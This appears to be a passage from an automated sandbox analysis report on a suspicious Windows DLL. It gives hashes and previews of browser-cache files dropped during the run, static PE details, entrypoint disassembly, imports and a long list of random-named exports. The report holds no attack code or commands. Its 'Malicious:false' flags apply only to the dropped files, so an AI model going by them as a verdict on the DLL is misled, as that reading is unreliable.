                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                                                                                                                                                                                                  MD5:636BACD8AA35BA805314755511D4CE04
                                                                                                                                                                                                                  SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                                                                                                                                                                                                  SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                                                                                                                                                                                                  SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..|......|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.|.Q...Q..i~.|...._...'..Q...".....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBX2afX[2].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                  Entropy (8bit):7.684764008510229
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                                                                                                                                                                                                  MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                                                                                                                                                                                                  SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                                                                                                                                                                                                  SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                                                                                                                                                                                                  SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u.....*.,I"...)...z............>.OVObQ......d?|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ*!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...|X..."!..'*/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...K*q..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\de-ch[1].htm
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):428926
                                                                                                                                                                                                                  Entropy (8bit):5.436232896629168
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:gfyJUQxx+jAkJ8Yia4TJT4a4DGgwNUXDRowtuVCsiL2Y/JTAWJxLf:gfyFOjYhUWBrY5vJh
                                                                                                                                                                                                                  MD5:780BD044AC64BECDAD1545496F579D56
                                                                                                                                                                                                                  SHA1:D0EB7744E953991D6199544AF3EDAA9D977EAF92
                                                                                                                                                                                                                  SHA-256:16ADDCC5537F556DF125E018B77E8CC60F90AB8C1DDE735008ACC81EAD3E1E1E
                                                                                                                                                                                                                  SHA-512:4C03945570B99E3B8E545AA7932871627BE8291185CE9E25715D3099E433732EE4DCCA46426121A9F341569902ACD5280179E878C6C72502F4543F41339512D2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211130_25944225;a:3f63a966-32e8-4847-9963-edd4f4f5d89a;cn:32;az:{did:2be360ae5c6345da911d978376c0449f, rid: 32, sn: neurope-prod-hp, dt: 2021-11-29T21:43:20.0514094Z, bt: 2021-11-30T01:14:54.5479932Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-12-02 23:41:08Z;axd:;f:msnallexpusers,muidflt15cf,muidflt28cf,muidflt55cf,oneboxdhpcf,pneedge1cf,platagyedge2cf,bingcollabedge3cf,platagyhp1cf,pnehz1cf,artgly1cf,artgly5cf,article3cf,gallery2cf,onetrustpoplive,msnapp2cf,msnapp4cf,1s-bing-news,vebudumu04302020,bbh20200521msn,shophp1cf,sagehz1cf,msnsports4cf,msnsports5cf,j0jee471,msnsapphire2cf,6bc60644,1s-br30min,btrecrow1,1s-winauthservice,1s-winsegservice,prong2t,1s-pagesegservice,routentpring2t;u
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):84249
                                                                                                                                                                                                                  Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                  MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                  SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                  SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                  SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF4AB291A385B95D5D.TMP
                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                  Entropy (8bit):0.08205608692866923
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:y/M6RlKVD/M6cNk3dl/g/lclllv/nt+lybltll1lRslkhlEkllDbP06BAI6rtl:yk+lODkC3dtgUFAlkxMA9Y
                                                                                                                                                                                                                  MD5:8AFBE5A88BDF6BCBF8FD0F011EC663D8
                                                                                                                                                                                                                  SHA1:8E0756EE8F5F63180F547C629BE6DD40E239E5FE
                                                                                                                                                                                                                  SHA-256:6CA1A2FFB835C5C56790B63B10150C27BB448D3A30876DFC5C440EE1D43E5DA6
                                                                                                                                                                                                                  SHA-512:FC5518862267E82447533602777B287E45232AE5BD84442E211045AE02E8C34427EF5C40E18F6F063339D1C417528D770E49B6293BACB1A751DAAC87BC63F539
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFF3249FCAE5CBA117.TMP
                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):176128
                                                                                                                                                                                                                  Entropy (8bit):3.3425082041597016
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:NZ/2Bfcdmu5kgTzGtWZ/2Bfc+mu5kgTzGt:U9
                                                                                                                                                                                                                  MD5:5A1062613645F469B740CFC68BD51305
                                                                                                                                                                                                                  SHA1:481958E821696ADCB32BDA8F34681FE0C1505BFA
                                                                                                                                                                                                                  SHA-256:258215A76607588433C0E9D4DC95AF7DEACADFD71D4C25355E516E3A2768C0A6
                                                                                                                                                                                                                  SHA-512:16B96DEBC5436C8F9539A6F1690DD641502D94C5CA475590F8C277302F5B5F1836F74838DEB1E37F7BC12D14CA5049D33FD77C7247E1D3143703AE489B5A1BC8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Entropy (8bit):7.16007617391323
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                  File name:mATFWhYtPk.dll
                                                                                                                                                                                                                  File size:460288
                                                                                                                                                                                                                  MD5:70798426016c93e3d52363c8a902333f
                                                                                                                                                                                                                  SHA1:02f29a5c7e7f8230b86d26b36757c1aaa968dde7
                                                                                                                                                                                                                  SHA256:5e3bcb83c60c7d06d42822afe1d36c3b0f866ef678935c5903cda936009713a1
                                                                                                                                                                                                                  SHA512:4f8b8eb30ae59f4d167a5ee4cf0cf48f569765dcd999cbab7bfb2c6d46225b9675a5d73998ecb75481d6503b9f4a0a8023341ab3ea0b564ba294d82c5a2d400b
                                                                                                                                                                                                                  SSDEEP:6144:31v9X/WHuR1R0bB5HKg0EWBe0uCvn7DOPnAOEiZguxc16uoSr4j7G63up9A2:31J/WHlN5HKcWEMn70TxnuF+jKx
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l.I.l.I.l.I...H.l.I...Hql.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I...H.l.I.l.I7l.IY..H.l.IY..H.l.IY.xI.l.I.l.I.l.IY..H.l.

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Entrypoint:0x10014b4e
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                  Imagebase:0x10000000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                  Time Stamp:0x61A8FF66 [Thu Dec 2 17:16:22 2021 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:479782c40538d0c8b72b2791f9b6cfc8

                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                  cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                                                                  jne 00007F77109DFF67h
                                                                                                                                                                                                                  call 00007F77109E036Dh
                                                                                                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                  call 00007F77109DFE13h
                                                                                                                                                                                                                  add esp, 0Ch
                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                  retn 000Ch
                                                                                                                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                                                  mov dword ptr [ecx+04h], 100393E0h
                                                                                                                                                                                                                  mov dword ptr [ecx], 100393D8h
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                  sub esp, 0Ch
                                                                                                                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                  call 00007F77109DFF3Fh
                                                                                                                                                                                                                  push 10048714h
                                                                                                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  call 00007F77109E366Eh
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                  and dword ptr [1004C858h], 00000000h
                                                                                                                                                                                                                  sub esp, 24h
                                                                                                                                                                                                                  or dword ptr [1004B00Ch], 01h
                                                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                                                  call dword ptr [10039198h]
                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                  je 00007F77109E010Fh
                                                                                                                                                                                                                  and dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                  lea edi, dword ptr [ebp-24h]
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  cpuid
                                                                                                                                                                                                                  mov esi, ebx
                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                  mov dword ptr [edi], eax
                                                                                                                                                                                                                  mov dword ptr [edi+04h], esi
                                                                                                                                                                                                                  mov dword ptr [edi+08h], ecx
                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                  mov dword ptr [edi+0Ch], edx
                                                                                                                                                                                                                  mov eax, dword ptr [ebp-24h]
                                                                                                                                                                                                                  mov edi, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                  xor edi, 6C65746Eh
                                                                                                                                                                                                                  mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                  xor eax, 49656E69h
                                                                                                                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                  mov eax, dword ptr [ebp-20h]
                                                                                                                                                                                                                  xor eax, 756E6547h
                                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  cpuid

                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x491b00x8a0.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x49a500xb4.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x22a48.rsrc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2cbc.reloc
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x456d80x40.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x390000x2fc.rdata
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                  .text0x10000x3758c0x37600False0.53513861456data6.64921372375IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .rdata0x390000x11a900x11c00False0.49326034331data5.48757616552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .data0x4b0000x238c0x1600False0.224076704545data3.92619596438IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .rsrc0x4e0000x22a480x22c00False0.808425134892data7.71446294109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                  .reloc0x710000x2cbc0x2e00False0.72707201087data6.54560043785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                  TYPELIB0x702300x670dataEnglishUnited States
                                                                                                                                                                                                                  RT_BITMAP0x4e1900x21e67dataEnglishUnited States
                                                                                                                                                                                                                  RT_STRING0x708a00x26dataEnglishUnited States
                                                                                                                                                                                                                  RT_VERSION0x6fff80x238dataEnglishUnited States
                                                                                                                                                                                                                  RT_MANIFEST0x708c80x17dXML 1.0 document textEnglishUnited States

                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                  pdh.dllPdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhValidatePathW, PdhOpenQueryW
                                                                                                                                                                                                                  KERNEL32.dllIsSystemResumeAutomatic, GetSystemDefaultLangID, GetCommandLineW, GetLastError, GetCurrentThread, GetLargePageMinimum, GetUserDefaultLangID, FlushProcessWriteBuffers, GetACP, GetCurrentProcess, MultiByteToWideChar, RaiseException, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, TerminateProcess, ReadConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, GetUserDefaultUILanguage, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, FreeEnvironmentStringsW, GetCommandLineA, IsValidCodePage, FindFirstFileExA, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleFileNameA, GetModuleHandleExW, ExitProcess, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, InterlockedFlushSList, RtlUnwind, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, GetOEMCP, GetCurrentThreadId, GetProcessHeap, CloseHandle, ReadFile, SetUnhandledExceptionFilter, FindClose, FindNextFileA, GetEnvironmentStringsW, GetTickCount64, SetFilePointerEx, SetStdHandle, CreateFileW, WriteConsoleW, IsProcessorFeaturePresent, IsDebuggerPresent, OutputDebugStringW, GetCPInfo, GetStringTypeW, LCMapStringEx, EncodePointer, LocalFree, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, UnhandledExceptionFilter, QueryPerformanceCounter, GetStartupInfoW
                                                                                                                                                                                                                  USER32.dllGetDesktopWindow, GetCursor, GetClipboardSequenceNumber, GetMessageTime, GetProcessWindowStation, CreateMenu, GetOpenClipboardWindow, GetForegroundWindow, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, GetWindowLongW, SetWindowLongW, CharNextW, UnregisterClassW, CloseClipboard, SetProcessDPIAware, GetCapture, GetMenuCheckMarkDimensions, GetFocus, GetClipboardViewer
                                                                                                                                                                                                                  GDI32.dllSetBkMode, SetTextColor, DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, GetTextMetricsW, SelectObject, GetDeviceCaps, GdiFlush, CreateFontW
                                                                                                                                                                                                                  ADVAPI32.dllRegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
                                                                                                                                                                                                                  SHELL32.dllSHGetFolderPathW, ShellExecuteW, InitNetworkAddressControl
                                                                                                                                                                                                                  ole32.dllCoFreeUnusedLibraries, CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
                                                                                                                                                                                                                  OLEAUT32.dllVarBstrCmp, VariantInit, VariantClear, VariantCopy, VariantChangeType, SysStringLen, LoadTypeLib, LoadRegTypeLib, SysFreeString, SysAllocStringLen, VarUI4FromStr, SysAllocString

                                                                                                                                                                                                                  Exports

                                                                                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                                                                                  DllRegisterServer10x100011a0
                                                                                                                                                                                                                  asbiqstaeqzsycc20x100014d0
                                                                                                                                                                                                                  atwuhkycfybkj30x10001760
                                                                                                                                                                                                                  bdkipyvq40x100012a0
                                                                                                                                                                                                                  bgbbytziolo50x100012f0
                                                                                                                                                                                                                  buecjdyytb60x100011e0
                                                                                                                                                                                                                  buuxyumhydisdj70x10001200
                                                                                                                                                                                                                  bxjjwud80x10001640
                                                                                                                                                                                                                  clggklbu90x10001260
                                                                                                                                                                                                                  cntrlguzspnq100x10001730
                                                                                                                                                                                                                  cqidywf110x10001660
                                                                                                                                                                                                                  djkkikrsnitzvwf120x10001270
                                                                                                                                                                                                                  dlweylze130x100013b0
                                                                                                                                                                                                                  dtbwdepznmd140x10001440
                                                                                                                                                                                                                  ecpkvrx150x10001620
                                                                                                                                                                                                                  efcawfftccniumljx160x100014f0
                                                                                                                                                                                                                  egkmoop170x100011f0
                                                                                                                                                                                                                  eilzujryft180x10001700
                                                                                                                                                                                                                  eoglvqgtpydaong190x10001560
                                                                                                                                                                                                                  eqnjunmaejgsagb200x10001370
                                                                                                                                                                                                                  erthjldiugveugnor210x100015e0
                                                                                                                                                                                                                  etiixdr220x10001430
                                                                                                                                                                                                                  fdnaddiuzoum230x100016e0
                                                                                                                                                                                                                  fgttknturxz240x10001400
                                                                                                                                                                                                                  fkskecmnjoqvvgp250x100015a0
                                                                                                                                                                                                                  flnfqcriiyzdbadz260x10001340
                                                                                                                                                                                                                  fmjodsewhbuaejpl270x10001250
                                                                                                                                                                                                                  fqpyrgjtynfnlox280x10001500
                                                                                                                                                                                                                  gabmdsnkjw290x10001490
                                                                                                                                                                                                                  gmhczrdec300x100014c0
                                                                                                                                                                                                                  gpwfihalwtdyrr310x10001390
                                                                                                                                                                                                                  hejnyandibnln320x10001520
                                                                                                                                                                                                                  hfrdrmoablxlonx330x10001460
                                                                                                                                                                                                                  hghwgdeluqykt340x10001320
                                                                                                                                                                                                                  ihvqvvzicpewq350x100015f0
                                                                                                                                                                                                                  iivajhlwfsi360x10001570
                                                                                                                                                                                                                  iuewaljhzdajm370x10001650
                                                                                                                                                                                                                  ixfqbarltsoutiwrf380x100011d0
                                                                                                                                                                                                                  jiikqoz390x100016c0
                                                                                                                                                                                                                  jvsgknrooldoct400x10001510
                                                                                                                                                                                                                  kjyqzajsdguapua410x10001590
                                                                                                                                                                                                                  kwsihdno420x100016d0
                                                                                                                                                                                                                  ldvtgxarzpsvc430x100012d0
                                                                                                                                                                                                                  lmkekwksma440x10001530
                                                                                                                                                                                                                  lpoaczhizwuq450x100013e0
                                                                                                                                                                                                                  lqklhxhfdczxx460x10001420
                                                                                                                                                                                                                  lxtpgaxbhm470x10001450
                                                                                                                                                                                                                  mhfpmkypor480x100016f0
                                                                                                                                                                                                                  mhvdtqxiglxgz490x100016a0
                                                                                                                                                                                                                  mhzcnjwqmsxbihhto500x10001220
                                                                                                                                                                                                                  msrwnbgrhdtsetv510x100015d0
                                                                                                                                                                                                                  mtkcasew520x10001480
                                                                                                                                                                                                                  mvoppusdtxscqr530x10001710
                                                                                                                                                                                                                  oeoymgdahyvguvzi540x10001310
                                                                                                                                                                                                                  ohsciassscvpnmi550x10001680
                                                                                                                                                                                                                  onppoychphgi560x10001300
                                                                                                                                                                                                                  opcxlbmh570x10001740
                                                                                                                                                                                                                  ozilutnvrlbvn580x100014a0
                                                                                                                                                                                                                  ozwkxraxpjk590x10001350
                                                                                                                                                                                                                  pdvrunqhpz600x10001750
                                                                                                                                                                                                                  psqhlqv610x100012e0
                                                                                                                                                                                                                  qbqlyqjrvvezlrnv620x10001200
                                                                                                                                                                                                                  qqpnleaimqeigmzwd630x10001550
                                                                                                                                                                                                                  ribbymfwgtqxvmazw640x10001600
